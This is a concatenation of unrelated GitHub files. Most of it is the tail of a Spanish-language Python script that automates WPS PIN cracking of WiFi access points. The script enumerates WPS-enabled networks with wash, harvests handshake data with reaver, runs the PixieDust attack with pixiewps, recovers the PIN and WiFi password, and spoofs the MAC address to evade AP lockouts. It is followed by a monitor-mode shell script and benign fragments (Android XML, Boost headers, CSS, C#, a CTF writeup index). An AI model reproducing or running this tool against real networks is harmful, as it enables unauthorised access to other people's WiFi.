uberlista = [PKE.strip(),PKR.strip(),HASH1.strip(),HASH2.strip(),AUTHKEY.strip(),
MANUFACTURER.strip(),MODEL.strip(),NUMBER.strip(),E_NONCE.strip(),R_NONCE.strip(),
ESSID.strip(),BSSID.strip()]
return uberlista
def check(self, check_again = False):
"""
Chequea dependencias, el usuario que ejecuta el programa y otras weas
"""
if c.get_uid() != '0':
print ALERTA + 'Necesita ejecutar este programa como superusuario'
exit()
### Programas
if c.program_exists(MACCHANGER):
self.MACCHANGER = True
elif not check_again:
print ALERTA + 'macchanger no esta instalado pero no es vital para el programa.'
print ' Algunos APs bloquean la MAC del dispositivo con el que se ataca y'
print ' cambiar la MAC es una buena solucion para desviar el problema.'
print ' Si no se tiene macchanger el programa fallara en recolectar la informacion.'
self.MACCHANGER = False
if c.program_exists(REAVER):
version = c.check_reaver_version()
if version == '1.5.2':
self.REAVER = True
else:
print ALERTA + "La version de reaver instalada no es la correcta"
self.REAVER = False
elif not check_again:
print ALERTA + 'reaver no esta instalado'
self.REAVER = False
if c.program_exists(PIXIEWPS):
self.PIXIEWPS = True
elif not check_again:
print ALERTA + 'pixiewps no esta instalado'
self.PIXIEWPS = False
if c.program_exists(WASH):
self.WASH = True
elif not check_again:
print ALERTA + 'wash no esta instalado'
self.WASH = False
if c.program_exists(AIRMON):
self.AIRMON = True
elif not check_again:
print ALERTA + 'airmon-ng no esta instalado'
self.AIRMON = False
if c.program_exists(GIT):
self.GIT = True
elif not check_again:
self.GIT = False
if self.REAVER and self.AIRMON and self.WASH and self.PIXIEWPS and check_again:
print INFO + "Todos los programas se instalaron correctamente."
raw_input("%sPresione enter para continuar" %INPUT)
print INFO + "Empezando el ataque..."
elif check_again:
print
print ALERTA + "No se pudieron instalar algunos prorgamas."
print " Revise manualmente las dependecias necesitadas"
print " y luego de instalarlas, ejecute otra vez el programa."
print
exit()
if self.REAVER and self.AIRMON and self.WASH and self.PIXIEWPS:
pass
else:
print ALERTA + "Necesita tener todos los programas necesarios."
print INPUT + "Las dependencias son:"
print "\tbuild-essential"
print "\tlibpcap-dev"
print "\tsqlite3"
print "\tlibsqlite3-dev"
print "\taircrack-ng"
print "\tlibssl-dev"
choice = raw_input("%sDesea que instalarlas ahora [S/n]?" %INPUT)
if choice in CHOICES_YES:
c.get_binarios()
else:
exit()
###Todo en orden...
engine.start()
def run(self, cmd, shell = False, kill_tree = True, timeout = -1):
"""
Ejecuta un comando durante un tiempo determinado que,
transcurrido, es terminado. Devuelve el stdout del proc.
output es una lista con las lineas sin strip().
"""
class Alarm(Exception):
pass
def alarm_handler(signum, frame):
raise Alarm
if timeout != -1:
signal(SIGALRM, alarm_handler) # Empieza a correr el tiempo
alarm(timeout) # Si se acaba levanta una alarma
proc = subprocess.Popen(cmd, shell = shell, stdout = subprocess.PIPE)
output = []
try:
for line in iter(proc.stdout.readline, ''):
output.append(line)
if timeout != -1:
alarm(0)
except Alarm: # El tiempo acaba y se produce una alarma
pids = [proc.pid] # Se matan los procesos relacionados con proc.
if kill_tree:
pids.extend(self.get_process_children(proc.pid))
for pid in pids: # Es posible que el proceso haya muerto antes de esto
try: # por eso se maneja el error con el except OSError
kill(pid, SIGKILL)
except OSError:
pass
return output
return output
def get_process_children(self, pid):
"""
Devuelve los pids del programa que se haya abierto para
matar todo el arbol de procesos child
"""
proc = subprocess.Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True, stdout = subprocess.PIPE)
stdout = proc.communicate()[0]
return [int(p) for p in stdout.split()]
def mac_changer(self):
"""
Cambia la MAC del dispositivo ante un bloqueo del AP
"""
print INFO + "Cambiando direccion MAC del dispositivo..."
system('ifconfig %s down' %c.IFACE_MON)
system('iwconfig %s mode Managed' %c.IFACE_MON)
system('ifconfig %s up' %c.IFACE_MON)
system('ifconfig %s down' %c.IFACE_MON)
mac = subprocess.check_output(['macchanger','-r',c.IFACE_MON])
mac = mac.split('\n')[2]
mac = sub('New MAC\: ','',mac.strip())
mac = sub(' \(unknown\)','',mac)
system('ifconfig %s up' %c.IFACE_MON)
system('ifconfig %s down' %c.IFACE_MON)
system('iwconfig %s mode monitor' %c.IFACE_MON)
system('ifconfig %s up' %c.IFACE_MON)
print INFO + "Se cambio la MAC a una nueva: %s%s" %(INPUT,mac.upper())
def exit_limpio(self):
"""
limpia las cosas antes de terminar el programa
"""
if path.isfile('/root/pixiewps/Makefile') or path.isfile('/root/reaver-wps-fork-t6x/src/Makefile'):
print OPCION + "Los archivos para instalar pixiewps y reaver ya no son necesarios"
print " y se encuentran en la carpeta home del usuario root"
choice = raw_input("%sDesea borrarlos? [S/n]" %INPUT)
if choice in CHOICES_YES:
system('cd /root && rm -r pixiewps/ && rm -r reaver-wps-fork-t6x/')
if c.IS_MON:
c.set_iface("DOWN")
if USE_REAVER:
system('rm -f /usr/local/etc/reaver/*.wpc')
exit()
class Config():
"""
Funciones de configuracion de interfaces.
"""
IFACE_MON = 'caca'
IFACE = 'caca'
IS_MON = False
def program_exists(self, programa):
"""
Chequea si existe el programa que se le
pasa en el argumento
"""
cmd = "which " + programa
output = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE)
output = output.communicate()[0]
if output != "":
return True # Existe
else:
return False # No existe
def get_uid(self):
"""
Devuelve el usuario que ejecuta el script
"""
uid = subprocess.check_output(['id','-u']).strip()
return uid
def check_iface(self):
"""
Se fija si hay alguna interfaz en modo monitor
para no crear otra interfaz al pedo
"""
cmd = "ifconfig | grep mon | cut -d \' \' -f1" # iwconfig no es grepable
mon = subprocess.check_output(cmd, shell = True).strip()
if mon != '':
self.IFACE_MON = mon
self.IS_MON = True
return True
else:
return False
def get_iface(self):
"""
Si no hay interfaces en modo monitor, devuelve las wlans.
Si hay mas de una, pregunta cual se quiere usar.
Si la interfaz ya esta en modo monitor, devuelve el nombre.
"""
if self.IS_MON: # Si la interfaz esta en modo monitor devuelve el nombre 'mon'
cmd = "ifconfig | grep mon | cut -d \' \' -f1"
mon = subprocess.check_output(cmd, shell = True).strip()
self.IFACE_MON = mon
return mon
else:
cmd = "ifconfig | grep wlan | cut -d \' \' -f1"
proc = subprocess.check_output(cmd, shell = True)
ifaces = proc.strip().split('\n')
if len(ifaces) == 1 and ifaces[0] == '':
print ALERTA + "No hay interfaces wireless!"
print " Asegurese de que posee un dispositivo wireless."
print " Si esta corriendo en una maquina virtual debe"
print " adquirir un modulo WiFi USB."
exit()
elif len(ifaces) > 1:
print INPUT + "Seleccione interfaz: "
for i in ifaces:
print str(ifaces.index(i)) + " >> " + i
while True: #Evita que le mandes fruta
try:
choice = int(raw_input(INPUT))
if choice <= len(ifaces) and choice >= 0:
self.IFACE = ifaces[choice]
return ifaces[choice]
break
else:
print INPUT + "Inserte un numero entre 0 y %s" %(len(ifaces)-1) #Maneja el error de indice
except ValueError:
print ALERTA + "Inserte un numero entre 0 y %s" %(len(ifaces)-1) #Por si le mandas letras y no #s
except KeyboardInterrupt:
print
print ALERTA + "Programa interrumpido"
print
engine.exit_limpio()
else:
self.IFACE = ifaces[0]
return ifaces[0]
def set_iface(self, status):
"""
Maneja la interfaz inalambrica. La pone en modo monitor
y la repone al modo normal.
La variable "status" esta solo para mejorar la lectura
Se basa en el booleano "self.IS_MON"
"""
if self.IS_MON:
cmd = 'airmon-ng stop ' + self.get_iface()
print INFO + 'Terminando el modo monitor en la interfaz %s...' %self.IFACE_MON
proc = subprocess.call(cmd, shell = True, stdout = subprocess.PIPE)
self.IS_MON = False
print INFO + 'Listo'
else:
cmd = 'airmon-ng start ' + self.get_iface()
print INFO + 'Configurando la interfaz en modo monitor...'
proc = subprocess.call(cmd, shell = True, stdout = subprocess.PIPE)
self.check_iface()
print INFO + "%s corriendo en modo monitor" %self.IFACE
def data_file(self, data):
"""
Guarda la informacion en un archivo
"""
system('echo INFORMACION >> %s' %OUTPUT_FILE)
with open(OUTPUT_FILE, 'a+') as f:
fecha = str(time.gmtime()[1])+'-'+str(time.gmtime()[2])+'-'+str(time.gmtime()[0])
hora = str((time.gmtime()[3])-3).zfill(2)+':'+str(time.gmtime()[4]).zfill(2)
f.write(fecha+' | '+hora+'\n')
f.writelines(data)
print INFO + "Se guardo la informacion en el archivo %s" %OUTPUT_FILE
def get_binarios(self):
"""
Instala reaver, pixiewps y otras dependencias
"""
git = 'apt-get -y install git'
reaver_dep = 'apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng'
pixie_dep = 'sudo apt-get -y install libssl-dev'
reaver = 'git clone https://github.com/t6x/reaver-wps-fork-t6x.git'
pixiewps = 'git clone https://github.com/wiire/pixiewps.git'
aircrack = 'apt-get -y install aircrack-ng'
if not engine.GIT:
print INFO + "Instalando git"
proc4 = system(git)
if not engine.AIRMON:
print INFO + "Instalando aircrack..."
proc5 = system(aircrack)
if not engine.PIXIEWPS:
print INFO + "Instalando dependencias de pixiewps..."
proc2 = system(pixie_dep)
print INFO + "Descargando pixiewps..."
proc3 = system(pixiewps)
if not engine.REAVER:
print INFO + "Instalando las dependencias de reaver..."
proc = system(reaver_dep)
print INFO + "Descargando reaver..."
proc1 = system(reaver)
if path.isdir('pixiewps') and not engine.PIXIEWPS:
print INFO + "Instalando pixiewps..."
system('cd pixiewps/src && make && make install')
print INFO + "Listo"
if path.isdir('reaver-wps-fork-t6x') and not engine.REAVER:
print INFO + "Instalando reaver..."
system('cd reaver-wps-fork-t6x* && cd src && ./configure && make && make install')
print INFO + "Listo"
engine.check(check_again = True)
def check_reaver_version(self):
"""
Devuelve la version de reaver que se tiene instalada
"""
output = subprocess.Popen('reaver -h', shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
output = output.communicate()
if 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[0] and 'mod by t6_x' in output[0]:
return '1.5.2'
elif output[0] != '':
return output[0][9:12]
elif 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[1] and 'mod by t6_x' in output[1]:
return '1.5.2'
elif output[1] != '':
return output[1][9:12]
class Attack():
"""
Funciones de ataque y recopilacion de informacion del AP
"""
def get_wps_aps(self):
"""
Enumera los APs con WPS
Crea las instancias de Target.
Pasa a get_reaver_info
"""
print INFO + "Enumerando APs con WPS activado..."
cmd = 'wash -i %s -P' %(c.IFACE_MON)
if WASH_CHANNEL != '':
cmd = cmd + ' -c %d' %WASH_CHANNEL
lista_aps = engine.run(cmd, shell = True, timeout = WASH_TIME)
lista_provisoria = []
ultimo = len(lista_aps)-1
for linea in lista_aps: # Esto se tiene que hacer por irregularidades ocasionales
if '|' in linea: # en el output del wash.
lista_provisoria.append(linea) #
lista_aps = lista_provisoria #
if lista_aps == []:
print
print ALERTA + "No se encontraron APs con WPS activado."
print
if not FOREVER:
engine.exit_limpio()
else:
for_fill = lista_aps #\
essids = [] #|
for line in for_fill: #|- Para que quede mas linda la lista
line = line.split('|') #|- de los APs.
essids.append(line[5].strip()) #|
fill = len(max(essids)) #/
print INFO + "Se encontraron los siguientes APs con WPS activado:"
for linea in lista_aps:
linea = linea.split('|')
fill_line = fill - len(linea[5].strip())
print '\t' + INPUT + str(linea[5].strip()) + ' '*fill_line + ' || ' + linea[0] + ' || Canal: ' + linea[1] + ' || WPS locked?: ' + linea[4]
if USE_REAVER:
while True:
try:
if len(lista_aps) != 1 and PROMPT_APS:
choice = int(raw_input("%sProporcione el inice del AP: " %INPUT))
provisoria = []
provisoria.append(lista_aps[choice])
lista_aps = provisoria
break
else:
break
except KeyboardInterrupt:
print
engine.exit_limpio()
break
except ValueError:
print ALERTA + "Proporcione un numero entre 0 y %d" %ultimo
if not OVERRIDE and path.isfile('pyxiewpsdata.txt'):
coincidencias = []
pin_correspondiente = []
with open('pyxiewpsdata.txt') as f:
ya_sacados = f.readlines()
if len(ya_sacados) > 1:
ya_sacados.reverse() # Se revierte para tomar el pin mas actualizado ante un posible
for target in lista_aps: # cambio del pin WPS.
for line in ya_sacados[1:]:
if target.split('|')[5].strip() == line.strip():
coincidencias.append(target)
pin_correspondiente.append(ya_sacados[ya_sacados.index(line)-1].strip())
for i in set(coincidencias):
print OPCION + "El pin de %s ya ha sido averiguado: " %i.split('|')[5].strip()
print '\t'+ INPUT + pin_correspondiente[coincidencias.index(i)]
print OPCION + "Desea saltearlo? [S/n]: "
try:
choice = raw_input("%s Enter para saltear: " %INPUT)
except KeyboardInterrupt:
print
engine.exit_limpio()
if choice in CHOICES_YES:
lista_aps.remove(i)
for linea in lista_aps:
args = engine.parse_wash(linea.strip())
self.get_reaver_info(args[0],args[1],args[2])
if not FOREVER:
engine.exit_limpio()
else:
pass
def get_reaver_info(self, bssid, canal, essid):
"""
Recopila la informacion vital para
el ataque PixieDust. PKR, PKE, HASH1, HASH2, AUTHKEY
Actua dentro del for-loop de get_wps_aps
"""
print INFO + "Recopilando informacion de %s con reaver..." %essid
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',bssid,'-vvv','-L','-c',canal], timeout = REAVER_TIME)
data = engine.parse_reaver(output)
if data == 'noutput':
print
print ALERTA + "No se pudo obtener la informacion necesaria del AP"
print ALERTA + "Pruebe con un tiempo mas alto como argumento -t"
print " y si aun no se puede obtener la informacion"
print " mejore la recepcion de su interfaz"
print
if MACCHANGER and FOREVER:
engine.mac_changer()
elif MACCHANGER and not FOREVER:
print ALERTA + "No se cambia la MAC porque se ejecuto una sola vez"
print " Corra el programa con el argumento -F para correr indefinidamente"
print
elif not MACCHANGER:
print ALERTA + "No se puede cambiar la MAC del dispositivo"
print " porque no se tiene macchanger instalado."
print
elif data == 'more time please':
print
print ALERTA + "El programa obtuvo alguna informacion pero no alcanzo"
print " a recuperar todo lo necesario. Aumente el tiempo para buscar"
print " la informacion del AP con el argumento -t. Por default -t es 6 segundos"
print
elif data == 'ap rate limited':
print
print ALERTA + "Al AP no le gustan los ataques de WPS"
print " por lo tanto no se pudo recopilar la informacion"
print
if MACCHANGER and FOREVER:
engine.mac_changer()
elif MACCHANGER and not FOREVER:
print ALERTA + "No se cambia la MAC porque se ejecuto una sola vez"
print " Corra el programa con el argumento -F para atacar indefinidamente"
print
elif not MACCHANGER:
print ALERTA + "No se puede cambiar la MAC del dispositivo"
print " porque no se tiene macchanger instalado."
print
elif data == 'cacota':
print
print "Seleccione una opcion de sesion para reaver"
if not FOREVER:
engine.exit_limpio()
else:
print INFO + "Exito. Se encontro la informacion necesaria."
for_file = ['ESSID: ' + data[10] + '\n','MAC: ' + data[11] + '\n','PKE: ' + data[0] + '\n',
'PKR: ' + data[1] + '\n','HASH1: ' + data[2] + '\n','HASH2: ' + data[3] + '\n',
'E-NONCE: ' + data[8] + '\n','R-NONCE: ' + data[9] + '\n','AUTHKEY: ' + data[4] + '\n',
'FABRICANTE: ' + data[5] + '\n','MODELO: ' + data[6] + '\n','NUMERO DE MODELO: ' + data[7] + '\n']
if PRINT_REAVER:
print
for linea in for_file:
print DATA + linea.strip()
print
if OUTPUT and not USE_PIXIEWPS:
for_file.append('-'*40+'\n')
c.data_file(for_file)
if USE_PIXIEWPS:
self.pixie_attack(data,for_file,canal)
def pixie_attack(self,data,for_file,canal):
"""
intenta recuperar el pin WPS usando el ataque PixieDust
"""
ESSID = data[10]
BSSID = data[11]
PKE = data[0]
PKR = data[1]
HASH1 = data[2]
HASH2 = data[3]
AUTHKEY = data[4]
E_NONCE = data[8]
R_NONCE = data[9]
cmd = ['pixiewps','-e',PKE,'-r',PKR,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE]
cmd1 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE,'-S']
cmd2 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-n',E_NONCE,'-m',R_NONCE,'-b',BSSID,'-S']
pin = ''
cmd_list = [cmd, cmd1, cmd2]
output = []
for command in cmd_list:
try:
output = subprocess.check_output(command)
output = output.strip().split('\n')
for linea in output:
if '[+] WPS pin:' in linea:
result = compile('\d+')
pin = result.search(linea).group(0)
break
else:
pass
except: #Tengo que manejar un posible error del Pixie
pass
if pin != '': break
if pin != '' and len(pin) == 8:
print INFO + "Pin WPS encontrado!"
print "\t" + INPUT + pin
for_file.append('Pin WPS: '+pin+'\n')
system('echo >> pyxiewpsdata.txt')
with open('pyxiewpsdata.txt','a+') as f:
f.write(ESSID+'\n')
f.write(pin)
elif pin == '':
print
print ALERTA + "No se encontro el pin WPS."
print " Es posible que el AP no sea vulnerable al"
print " ataque PixieDust y nunca lo sea"
print
if GET_PASSWORD and pin != '':
self.get_password(for_file, BSSID, pin, canal)
elif OUTPUT:
for_file.append('-'*40+'\n')
c.data_file(for_file)
def get_password(self, for_file, BSSID, pin, canal):
"""
Intenta averiguar la contrasenia, una vez que se consiguio el pin WPS
"""
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',BSSID,'-c',canal,'-p',pin,'-L'], timeout = (REAVER_TIME+4))
password = engine.parse_reaver(output, pin_encontrado = True)
if password == 'no password':
print
print ALERTA + "No se pudo recuperar la contrasenia en este momento"
print " pero puede acceder a la red WiFi a traves del pin WPS"
print
else:
print INFO + "Clave encontrada!"
print '\t' + INPUT + password.strip()
if OUTPUT:
for_file.append('Password: ' + password + '\n'+'-'*40+'\n')
c.data_file(for_file)
if __name__ == '__main__':
arg_parser()
banner()
try:
c = Config()
engine = Engine()
engine.check()
except KeyboardInterrupt, EOFError:
print
print ALERTA + "Programa interrumpido!"
print
engine.exit_limpio()
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Keyboard xmlns:android="http://schemas.android.com/apk/res/android"
android:keyWidth="15%p"
android:keyHeight="@integer/key_normal_height">
<Row android:rowEdgeFlags="top">
<Key android:codes="54" android:keyEdgeFlags="left"/>
<Key android:codes="ñ"/>
<Key android:codes="ń"/>
</Row>
<Row android:rowEdgeFlags="bottom">
<Key android:codes="ò" android:keyEdgeFlags="left"/>
<Key android:codes="ó"/>
<Key android:codes="õ"/>
<Key android:codes="ô"/>
<Key android:codes="ö"/>
<Key android:codes="ø"/>
<Key android:codes="ő"/>
<Key android:codes="ō"/>
<Key android:codes="œ" android:keyEdgeFlags="right"/>
</Row>
</Keyboard>
| {
"pile_set_name": "Github"
} |
#!/usr/bin/sudo /bin/bash
modprobe -r iwlwifi mac80211 cfg80211
modprobe iwlwifi debug=0x40000
ifconfig wlan0 2>/dev/null 1>/dev/null
while [ $? -ne 0 ]
do
ifconfig wlan0 2>/dev/null 1>/dev/null
done
iw dev wlan0 interface add mon0 type monitor
iw mon0 set channel $1 $2
ifconfig mon0 up
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/aux_/reverse_fold_impl.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl { namespace aux {
/// forward declaration
template<
long N
, typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl;
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 0,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef fwd_state0 bkwd_state0;
typedef bkwd_state0 state;
typedef iter0 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 1,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef fwd_state1 bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter1 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 2,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef fwd_state2 bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter2 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 3,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef typename apply2< ForwardOp, fwd_state2, typename deref<iter2>::type >::type fwd_state3;
typedef typename mpl::next<iter2>::type iter3;
typedef fwd_state3 bkwd_state3;
typedef typename apply2< BackwardOp, bkwd_state3, typename deref<iter2>::type >::type bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter3 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 4,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef typename apply2< ForwardOp, fwd_state2, typename deref<iter2>::type >::type fwd_state3;
typedef typename mpl::next<iter2>::type iter3;
typedef typename apply2< ForwardOp, fwd_state3, typename deref<iter3>::type >::type fwd_state4;
typedef typename mpl::next<iter3>::type iter4;
typedef fwd_state4 bkwd_state4;
typedef typename apply2< BackwardOp, bkwd_state4, typename deref<iter3>::type >::type bkwd_state3;
typedef typename apply2< BackwardOp, bkwd_state3, typename deref<iter2>::type >::type bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter4 iterator;
};
template<
long N
, typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef typename apply2< ForwardOp, fwd_state2, typename deref<iter2>::type >::type fwd_state3;
typedef typename mpl::next<iter2>::type iter3;
typedef typename apply2< ForwardOp, fwd_state3, typename deref<iter3>::type >::type fwd_state4;
typedef typename mpl::next<iter3>::type iter4;
typedef reverse_fold_impl<
( (N - 4) < 0 ? 0 : N - 4 )
, iter4
, Last
, fwd_state4
, BackwardOp
, ForwardOp
> nested_chunk;
typedef typename nested_chunk::state bkwd_state4;
typedef typename apply2< BackwardOp, bkwd_state4, typename deref<iter3>::type >::type bkwd_state3;
typedef typename apply2< BackwardOp, bkwd_state3, typename deref<iter2>::type >::type bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef typename nested_chunk::iterator iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< -1,First,Last,State,BackwardOp,ForwardOp >
{
typedef reverse_fold_impl<
-1
, typename mpl::next<First>::type
, Last
, typename apply2<ForwardOp,State, typename deref<First>::type>::type
, BackwardOp
, ForwardOp
> nested_step;
typedef typename apply2<
BackwardOp
, typename nested_step::state
, typename deref<First>::type
>::type state;
typedef typename nested_step::iterator iterator;
};
template<
typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< -1,Last,Last,State,BackwardOp,ForwardOp >
{
typedef State state;
typedef Last iterator;
};
}}}
| {
"pile_set_name": "Github"
} |
# Writeup 33C3 CTF 2016
Team: akrasuski1, c7f.m0d3, cr019283, msm, nazywam, ppr, psrok, rev, shalom

### Table of contents
* [YOSO (web 250)](web_250_yoso)
* [Pay2Win (web 200)](web_200_pay2win)
* [list0r (web 400)](web_400_list0r)
* [try (web 150)](web_150_try) | {
"pile_set_name": "Github"
} |
using Microsoft.Extensions.Logging;
using System;
using System.Collections.Generic;
using System.Text;
using System.Threading;
namespace Surging.Core.ServiceHosting.Internal.Implementation
{
public class ApplicationLifetime : IApplicationLifetime
{
private readonly CancellationTokenSource _startedSource = new CancellationTokenSource();
private readonly CancellationTokenSource _stoppingSource = new CancellationTokenSource();
private readonly CancellationTokenSource _stoppedSource = new CancellationTokenSource();
private readonly ILogger<ApplicationLifetime> _logger;
public ApplicationLifetime(ILogger<ApplicationLifetime> logger)
{
_logger = logger;
}
public CancellationToken ApplicationStarted => _startedSource.Token;
public CancellationToken ApplicationStopping => _stoppingSource.Token;
public CancellationToken ApplicationStopped => _stoppedSource.Token;
public void NotifyStarted()
{
try
{
ExecuteHandlers(_startedSource);
}
catch (Exception ex)
{
_logger.LogError( "An error occurred starting the application",
ex);
}
}
public void NotifyStopped()
{
try
{
ExecuteHandlers(_stoppedSource);
}
catch (Exception ex)
{
_logger.LogError("An error occurred stopping the application",
ex);
}
}
public void StopApplication()
{
lock (_stoppingSource)
{
try
{
ExecuteHandlers(_stoppedSource);
}
catch (Exception ex)
{
_logger.LogError("An error occurred stopping the application",
ex);
}
}
}
private void ExecuteHandlers(CancellationTokenSource cancel)
{
if (cancel.IsCancellationRequested)
{
return;
}
cancel.Cancel(throwOnFirstException: false);
}
}
}
| {
"pile_set_name": "Github"
} |
/* iCheck plugin Minimal skin, orange
----------------------------------- */
.icheckbox_minimal-orange,
.iradio_minimal-orange {
display: inline-block;
*display: inline;
vertical-align: middle;
margin: 0;
padding: 0;
width: 18px;
height: 18px;
background: url(orange.png) no-repeat;
border: none;
cursor: pointer;
}
.icheckbox_minimal-orange {
background-position: 0 0;
}
.icheckbox_minimal-orange.hover {
background-position: -20px 0;
}
.icheckbox_minimal-orange.checked {
background-position: -40px 0;
}
.icheckbox_minimal-orange.disabled {
background-position: -60px 0;
cursor: default;
}
.icheckbox_minimal-orange.checked.disabled {
background-position: -80px 0;
}
.iradio_minimal-orange {
background-position: -100px 0;
}
.iradio_minimal-orange.hover {
background-position: -120px 0;
}
.iradio_minimal-orange.checked {
background-position: -140px 0;
}
.iradio_minimal-orange.disabled {
background-position: -160px 0;
cursor: default;
}
.iradio_minimal-orange.checked.disabled {
background-position: -180px 0;
}
/* HiDPI support */
@media (-o-min-device-pixel-ratio: 5/4), (-webkit-min-device-pixel-ratio: 1.25), (min-resolution: 120dpi) {
.icheckbox_minimal-orange,
.iradio_minimal-orange {
background-image: url([email protected]);
-webkit-background-size: 200px 20px;
background-size: 200px 20px;
}
} | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!-- Copyright (C) 2013 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<translate xmlns:android="http://schemas.android.com/apk/res/android"
android:interpolator="@android:anim/decelerate_interpolator"
android:fromYDelta="50%p" android:toYDelta="0"
android:duration="@android:integer/config_mediumAnimTime"/>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 1999-2010 Apple Inc. All rights reserved.
*
* @APPLE_OSREFERENCE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. The rights granted to you under the License
* may not be used to create, or enable the creation or redistribution of,
* unlawful or unlicensed copies of an Apple operating system, or to
* circumvent, violate, or enable the circumvention or violation of, any
* terms of an Apple operating system software license agreement.
*
* Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_OSREFERENCE_LICENSE_HEADER_END@
*/
/*
* Mach Operating System
* Copyright (c) 1991,1990,1989 Carnegie Mellon University
* All Rights Reserved.
*
* Permission to use, copy, modify and distribute this software and its
